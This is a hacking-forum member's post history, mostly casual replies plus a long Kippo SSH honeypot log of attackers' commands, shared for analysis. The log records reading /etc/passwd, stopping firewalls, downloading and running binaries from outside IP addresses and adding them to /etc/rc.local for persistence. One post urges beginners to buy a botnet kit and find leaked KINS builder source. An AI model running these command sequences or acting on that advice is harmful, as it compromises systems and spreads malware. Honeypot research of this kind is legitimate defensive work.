Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - nozzlechunks

Pages: [1] 2
1
Projects and Discussion / Re: Killing a Websites Adsense earning by creating click spikes.
« on: July 27, 2015, 03:32:24 pm »
WHOA, I don't know if it's this site's font or my resolution, but I was convinced this thread was about dick spikes and dickbots. I was sadly dissapointed.

2
General discussion / Re: Share your Rig
« on: July 13, 2015, 09:22:08 pm »
HP z840 Desktop
Running WindowsServer2012
512 GB SSD
3.5 TB HDD
512 GB RAM (Yes, RAM)

************************************

I left my ex for this box.

3
General discussion / Re: security cameras
« on: July 09, 2015, 09:10:53 pm »
This isn't even Google material, this is seriously RTFM. It's also not a security / hacking question. It's an IT question. I'm new here, and even I'm getting slightly irritated with this stuff.

For everyone EXCEPT the OP:  virtually every modern (i.e. not VHS) camera system has a means of exporting video to disc/dvr, in order to hand it over to law enforcement (that's typically the point of cameras, even though some orgs think throwing a fat and disgusting rentacop in front of a bunch of monitors equates to security). The one's I've played with usually also write a proprietary executable to the disc, which you must install locally to view the content, so you can't just pop open the video in a flash player or Windows Media.

4
Beginner's Corner / Re: physically hacking into mcdonalds computer system
« on: July 08, 2015, 09:57:26 pm »
This is a useful lesson in anonymity, too. Let's work with what the OP told us:

-Works at McDonalds (3500 stores, give or take)
-"In the ghetto" = high risk stores (500 stores).
-"It's always super dead" = lowest performing stores (200 stores)
-Win2003 + i2i (assuming it's not standard issue, some stores may have different video vendor) (100 stores)
-OP is about 18, getting GED, interested in computers.
-OP had specific interaction with manager

So with just that, you're talking maybe 100 managers being emailed about a specific interaction with a very specific person. Chances of detection are immense.

Probably 50% of people on hacking/security forums are working for corporations like McDonald's.

5
Beginner's Corner / Re: I would like to learn to analyze botnets, what knowledge I need to obtain
« on: July 08, 2015, 03:10:10 pm »
To the OP:

If you want to learn how botnet's work, buy one! Here's a crappy one for cheap:

http://www.worldwiredlabs.com/

Buy it, play with it. It's perfectly legal in a lab. You can also look for youtube videos on Netwire to see the basics:

-A builder, to create, configure, and compile your payload.
-A management console, to manage all the victim boxes calling back.

Seriously, learn the botnet ecosystem by creating and managing your own botnet. THEN start hammering on the skills once you get the big picture.


BITCHY EDIT: Really? Someone stole a cookie over this? I guess Sun Tzu was wrong when he said "know thy enemy?"

SUBSTANTIVE EDIT: You can also look for KINS Builder 2.0.0.0, which had it's source code leaked  recently in supposedly "criminal forums" that were totally easy to find and join. Not as user friendly as the "supported" stuff like Netwire, but it's free, and it's the real deal.

6
General discussion / Re: CryptoWall
« on: June 24, 2015, 05:16:45 pm »
Pay the ransom, try harder next time.

Even if we lived in a magical world where ransomware used weak encryption algorithms and even weaker keys, it would likely still take weeks, months, or centuries to bruteforce with great hardware. I assume your friend needs the document "now" or "soon."

I think the best advise you can give folks is to have a bitcoin wallet up and running. It sometimes takes people many days of research just to figure out how bitcoin works, which means even people willing to pay ransom won't be able to do it in time (7 days).

7
Hacking and Security / Re: 1 day of running a SSH honeypot
« on: June 24, 2015, 04:59:48 pm »
I don't have any of the files anymore, so who knows what they were pulling down. Probably bots and downloaders.

Yeah, I don't think these people are noobs. Lot of the stuff they do would work against an environment that was A) real, and 2) misconfigured. I'm guessing this is one of those operations where they scan for the low hanging stuff and then pass this off to the next team, to actually dig in to see what they got. If they get something interesting, they probably hand it off to a traversal team, etc.

If anyone has cool ideas for different experiments I could work on with Kippo and other honeypot tools, feel free to throw them out there or even PM me!

8
Hacking and Security / Re: 1 day of running a SSH honeypot
« on: June 23, 2015, 09:04:02 pm »
Necropost, at Proxx's suggestion.

Here's some honeypot logs containing post log-in activity. I was running Kippo with the fake shell environment. What you see, generally, is scripted activity, and it's by the numbers. Show up, look for passwords, then try to turn off the firewall via iptables and pull down files. None of the files were pulled down, of course, but I was able to hit a few of the download IPs and pull down that and more because they left directory traversal on.

Some interesting callouts... there are a number of techniques used to turn off the firewall, from IP Tables, all the way down to commands specific to certain NIX distros. Also, some of them actually tried to pull down distros to install on my box.

It took a while to find this, but I think I have more logs lying around. I'm also gonna' be playing with more honeypots later this summer, so I anticipate more to share.

Thanks for looking!

*Note, the long string is the session ID, so you can see every event that occurs in a particular session.


Code: [Select]
1,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:46",\N,1,"ls"
2,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:48",\N,1,"whoami"
3,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:53",\N,1,"cat /etc/pa"
4,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:57",\N,1,"cat /etc/passwd"
5,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:27:00",\N,1,"exit"
6,"72d8fc1448f211e4a63502b6d5d64ab8","2014-09-30 22:38:15",\N,1,"ls"
7,"72d8fc1448f211e4a63502b6d5d64ab8","2014-09-30 22:38:16",\N,1,"exit"
8,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:28",\N,1,"cat /etc/passwd"
9,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:30",\N,1,"exit"
10,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:31",\N,0,"quit"
11,"3a11f5444bc111e4b273024542c06214","2014-10-04 12:23:26",\N,1,"echo \"WinSCP: this is end-of-file:0\""
12,"486114e04bc111e4b273024542c06214","2014-10-04 12:23:49",\N,1,"echo \"WinSCP: this is end-of-file:0\""
13,"5dd168204bc111e4b273024542c06214","2014-10-04 12:24:25",\N,1,"echo \"WinSCP: this is end-of-file:0\""
14,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:02",\N,1,"ls"
15,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:10",\N,1,"uname -a"
16,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:22",\N,0,"http://120.24.62.114:8989/txma"
17,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:30",\N,0,"http://120.24.62.114:8989/txma"
18,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:35",\N,1,"wget http://120.24.62.114:8989/txma"
19,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:44",\N,0,"service iptables stop"
20,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:50:03",\N,1,"wget http://120.24.62.114:8989/txma"
21,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:50:38",\N,1,"ls"
22,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:51:06",\N,1,"wget http://120.24.62.114:8989/txma"
23,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:51:16",\N,1,"uname -a"
24,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:52:45",\N,0,"http://120.24.62.114:8989/qqwwqqww"
25,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:53:13",\N,0,"service iptables stop"
26,"307e51b44caf11e4b3d002b6d5d64ab8","2014-10-05 16:46:57",\N,1,"uname -a"
27,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:17",\N,0,"/etc/init.d/iptables stop"
28,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:21",\N,0,"service iptables stop"
29,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:25",\N,0,"SuSEfirewall2 stop"
30,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:29",\N,0,"reSuSEfirewall2 stop"
31,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:33",\N,1,"cd /tmp"
32,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:37",\N,1,"wget -c http://42.96.191.5:300/dd-wrt"
33,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:41",\N,1,"chmod 777 dd-wrt"
34,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:45",\N,0,"./dd-wrt"
35,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:49",\N,1,"wget -c http://42.96.191.5:300/Linux2.4"
36,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:53",\N,1,"chmod 777 Linux2.4"
37,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:57",\N,0,"./Linux2.4"
38,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:01",\N,1,"wget -c http://42.96.191.5:300/Linux2.6"
39,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:05",\N,1,"chmod 777 Linux2.6"
40,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:09",\N,0,"./Linux2.6"
41,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:13",\N,1,"wget -c http://42.96.191.5:300/linux-arm"
42,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:17",\N,1,"chmod 777 linux-arm"
43,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:21",\N,0,"./linux-arm"
44,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:25",\N,1,"wget -c http://42.96.191.5:300/linux-mips"
45,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:29",\N,1,"chmod 777 linux-mips"
46,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:33",\N,0,"./linux-mips"
47,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:11",\N,0,"/etc/init.d/iptables stop"
48,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:15",\N,0,"service iptables stop"
49,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:19",\N,0,"SuSEfirewall2 stop"
50,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:23",\N,0,"reSuSEfirewall2 stop"
51,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:27",\N,1,"cd /tmp"
52,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:31",\N,1,"wget -c http://42.96.191.5:300/G32"
53,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:35",\N,1,"chmod 0755 /tmp/G32"
54,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:39",\N,0,"./G32 &"
55,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:43",\N,1,"wget -c http://42.96.191.5:300/G64"
56,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:47",\N,1,"chmod 0755 /tmp/G64"
57,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:51",\N,0,"./G64 &"
58,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:55",\N,1,"wget -c http://42.96.191.5:300/FreeBsd"
59,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:59",\N,1,"chmod 0755 /tmp/FreeBsd"
60,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:03",\N,0,"./FreeBsd &"
61,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:07",\N,1,"wget -c http://42.96.191.5:300/linux-arm"
62,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:11",\N,1,"chmod 0755 /tmp/linux-arm"
63,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:15",\N,0,"./linux-arm &"
64,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:19",\N,1,"wget -c http://42.96.191.5:300/linux-mips"
65,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:23",\N,1,"chmod 0755 /tmp/linux-mips"
66,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:27",\N,0,"./linux-mips &"
67,"dddea0c252f211e482800254c1a985ea","2014-10-13 16:06:45",\N,1,"wget http://117.21.173.140:7000/lele"
68,"dddea0c252f211e482800254c1a985ea","2014-10-13 16:06:49",\N,1,"wget http://117.21.173.140:7000/lele"
69,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:30",\N,0,"service iptables stop"
70,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:37",\N,1,"wget wget http://222.186.34.123:123/1995xxoo"
71,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:44",\N,1,"chmod u+x 1995xxoo"
72,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:51",\N,0,"./1995xxoo &"
73,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:58",\N,1,"wget http://222.186.34.123:123/xxoo1995"
74,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:05",\N,1,"chmod u+x xxoo1995"
75,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:12",\N,0,"./xxoo1995 &"
76,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:19",\N,1,"cd /tmp"
77,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:26",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
78,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:33",\N,1,"echo \"./1995xxoo\">>/etc/rc.local"
79,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:40",\N,1,"echo \"./xxoo1995&\">>/etc/rc.local"
80,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:47",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
81,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:01",\N,0,"service iptables stop"
82,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:08",\N,1,"wget http://222.186.34.123:123/rrmr"
83,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:15",\N,1,"chmod u+x rrmr"
84,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:22",\N,0,"./rrmr &"
85,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:29",\N,1,"wget http://222.186.34.123:123/mmrr"
86,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:36",\N,1,"chmod u+x mmrr"
87,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:43",\N,0,"./mmrr &"
88,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:50",\N,1,"wget http://222.186.34.123:123/qgg"
89,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:57",\N,1,"chmod u+x qgg"
90,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:04",\N,0,"./qgg &"
91,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:11",\N,1,"cd /tmp"
92,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:18",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
93,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:25",\N,1,"echo \"./rrmr\">>/etc/rc.local"
94,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:32",\N,1,"echo \"./mmrr&\">>/etc/rc.local"
95,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:39",\N,1,"echo \"./qgg&\">>/etc/rc.local"
96,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:46",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
97,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:13",\N,0,"service iptables stop"
98,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:20",\N,1,"wget http://222.186.34.123:123/rrmr"
99,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:27",\N,1,"chmod u+x rrmr"
100,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:34",\N,0,"./rrmr &"
101,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:41",\N,1,"wget http://222.186.34.123:123/mmrr"
102,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:48",\N,1,"chmod u+x mmrr"
103,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:55",\N,0,"./mmrr &"
104,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:02",\N,1,"wget http://222.186.34.123:123/qgg"
105,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:09",\N,1,"chmod u+x qgg"
106,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:16",\N,0,"./qgg &"
107,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:23",\N,1,"cd /tmp"
108,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:30",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
109,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:37",\N,1,"echo \"./rrmr\">>/etc/rc.local"
110,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:44",\N,1,"echo \"./mmrr&\">>/etc/rc.local"
111,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:51",\N,1,"echo \"./qgg&\">>/etc/rc.local"
112,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
113,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:31",\N,1,"wget http://118.244.150.49:8889/ooxx59"
114,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:38",\N,1,"chmod +x ooxx59"
115,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:45",\N,0,"./ooxx59"
116,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:52",\N,1,"chattr +i ooxx59"
117,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:59",\N,1,"wget http://118.244.150.49:8889/ooxx95"
118,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:06",\N,1,"chmod +x ooxx95"
119,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:13",\N,0,"./ooxx95"
120,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:20",\N,1,"chattr +i ooxx95"
121,"7d478f0c5eba11e4b3d002b6d5d64ab8","2014-10-28 15:53:22",\N,1,"uname -a"
122,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:01",\N,0,"service iptables stop"
123,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:08",\N,1,"wget http://222.186.34.120:8899/ttz32"
124,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:14",\N,1,"chmod u+x ttz32"
125,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:20",\N,0,"./ttz32 &"
126,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:26",\N,1,"cd /tmp"
127,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:32",\N,1,"wget http://222.186.34.120:8899/ttz24"
128,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:38",\N,1,"chmod u+x ttz24"
129,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:44",\N,0,"./ttz24 &"
130,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:50",\N,1,"cd /tmp"
131,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:56",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
132,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:02",\N,1,"echo \"./ttz32&\">>/etc/rc.local"
133,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:08",\N,1,"echo \"./ttz24&\">>/etc/rc.local"
134,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:14",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
135,"edefd36a65c011e4b273024542c06214","2014-11-06 14:26:49",\N,1,"echo \"WinSCP: this is end-of-file:0\""
136,"39265708667c11e4b273024542c06214","2014-11-07 12:47:47",\N,1,"uname -a"
137,"b8065b4266a711e482800254c1a985ea","2014-11-07 17:58:57",\N,1,"wget http://204.44.104.93:8080/iten32"
138,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:51",\N,0,"/etc/init.d/iptables stop"
139,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:55",\N,1,"wget http://204.44.104.93:8080/iten32"
140,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:59",\N,1,"chmod 0755 iten32"
141,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:03",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
142,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:07",\N,1,"wget http://204.44.104.93:8080/iten64"
143,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:11",\N,1,"chmod 0755 iten64"
144,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:15",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
145,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:06",\N,0,"/etc/init.d/iptables stop"
146,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:16",\N,1,"wget http://204.44.104.93:8080/iten32"
147,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:26",\N,1,"chmod 0755 iten32"
148,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:36",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
149,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:46",\N,1,"wget http://204.44.104.93:8080/iten64"
150,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:56",\N,1,"chmod 0755 iten64"
151,"2300244e672211e482800254c1a985ea","2014-11-08 08:36:06",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
152,"06f0d958677011e482800254c1a985ea","2014-11-08 17:52:40",\N,0,"/etc/init.d/iptables stop"
153,"06f0d958677011e482800254c1a985ea","2014-11-08 17:52:50",\N,1,"wget http://204.44.104.93:8080/iten32"
154,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:00",\N,1,"chmod 0755 iten32"
155,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:10",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
156,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:20",\N,1,"wget http://204.44.104.93:8080/iten64"
157,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:30",\N,1,"chmod 0755 iten64"
158,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:40",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
159,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:30:58",\N,0,"service iptables stop"
160,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:03",\N,1,"wget http://60.169.74.173:8889/ux24"
161,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:08",\N,1,"chmod u+x ux24"
162,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:13",\N,0,"./ux24 &"
163,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:18",\N,1,"cd /tmp"
164,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:23",\N,1,"wget http://60.169.74.173:8889/ux32"
165,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:28",\N,1,"chmod u+x ux32"
166,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:33",\N,0,"./ux32 &"
167,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:38",\N,1,"cd /tmp"
168,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:43",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
169,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:48",\N,1,"echo \"./ux24&\">>/etc/rc.local"
170,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:53",\N,1,"echo \"./ux32&\">>/etc/rc.local"
171,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
172,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:32",\N,0,"service iptables stop"
173,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:38",\N,1,"wget http://60.169.74.173:8889/ha32"
174,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:44",\N,1,"chmod u+x ha32"
175,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:50",\N,0,"./ha32 &"
176,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:56",\N,1,"cd /tmp"
177,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:02",\N,1,"wget http://60.169.74.173:8889/ha24"
178,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:08",\N,1,"chmod u+x ha24"
179,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:14",\N,0,"./ha24 &"
180,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:20",\N,1,"cd /tmp"
181,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:26",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
182,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:32",\N,1,"echo \"./ha32&\">>/etc/rc.local"
183,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:38",\N,1,"echo \"./ha24&\">>/etc/rc.local"
184,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:44",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
185,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:35",\N,0,"service iptables stop"
186,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:41",\N,1,"wget http://60.169.79.211:8080/jiuwu"
187,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:47",\N,1,"chmod u+x jiuwu"
188,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:53",\N,0,"./jiuwu &"
189,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:59",\N,1,"cd /tmp"
190,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:05",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
191,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:11",\N,1,"echo \"./jiuwu&\">>/etc/rc.local"
192,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:17",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
193,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:45",\N,0,"service iptables stop"
194,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:50",\N,1,"wget http://222.186.34.123:8889/mu24"
195,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:55",\N,1,"chmod u+x mu24"
196,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:00",\N,0,"./mu24 &"
197,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:05",\N,1,"cd /tmp"
198,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:10",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
199,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:15",\N,1,"echo \"./mu24&\">>/etc/rc.local"
200,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:20",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
201,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:22:12",\N,1,"w"
202,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:22:16",\N,1,"uname -a"
203,"2c2d946c6a4611e4b3d002b6d5d64ab8","2014-11-12 08:30:42",\N,1,"echo \"WinSCP: this is end-of-file:0\""
204,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:32:55",\N,0,"54.69.25.214"
205,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:32:57",\N,0,"netstat"
206,"81d5ad7c6b4611e4b273024542c06214","2014-11-13 15:05:33",\N,1,"echo \"WinSCP: this is end-of-file:0\""
207,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:14",\N,1,"ls"
208,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:16",\N,1,"cd .."
209,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:17",\N,1,"ls"
210,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:20",\N,1,"cat /etc/passwd"
211,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:21",\N,1,"ls"
212,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:27",\N,1,"exit"
213,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:29",\N,1,"exit"
214,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:31",\N,0,"quit"
215,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:10",\N,1,"wget www.google.com"
216,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:13",\N,0,"quit"
